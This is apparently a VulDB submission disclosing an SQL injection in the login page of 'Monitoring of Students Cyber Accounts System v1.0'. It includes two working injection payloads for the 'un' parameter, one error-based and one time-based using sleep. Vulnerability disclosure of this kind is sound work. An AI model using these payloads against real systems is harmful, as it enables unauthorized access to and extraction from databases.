Title | Monitoring of Students Cyber Accounts System v1.0 /MSCAB/login.php POST parameter un exists SQL injection vulnerability |
---|
Description | An issue was discovered in Monitoring of Students Cyber Accounts System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /MSCAB/login.php post parameter 'un'.
Payload1:un=a' and (select 6 from(select count(*),concat(0x61626364,(select (elt(66=66,1))),0x71727374,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- a&up=b&log=Login
Payload2:un=a' and (select 7 from (select(sleep(10)))e)-- n&up=b&log=Login |
---|
Source | ⚠️ https://github.com/xyaly163/bug_report/blob/main/SQLi-1.md |
---|
User | Xue Yue (ID 43195) |
---|
Submission | 2023年03月17日 16:28 (1 Year ago) |
---|
Moderation | 2023年03月18日 09:27 (17 hours later) |
---|
Status | 承諾済み |
---|
VulDB Entry | 223363 |
---|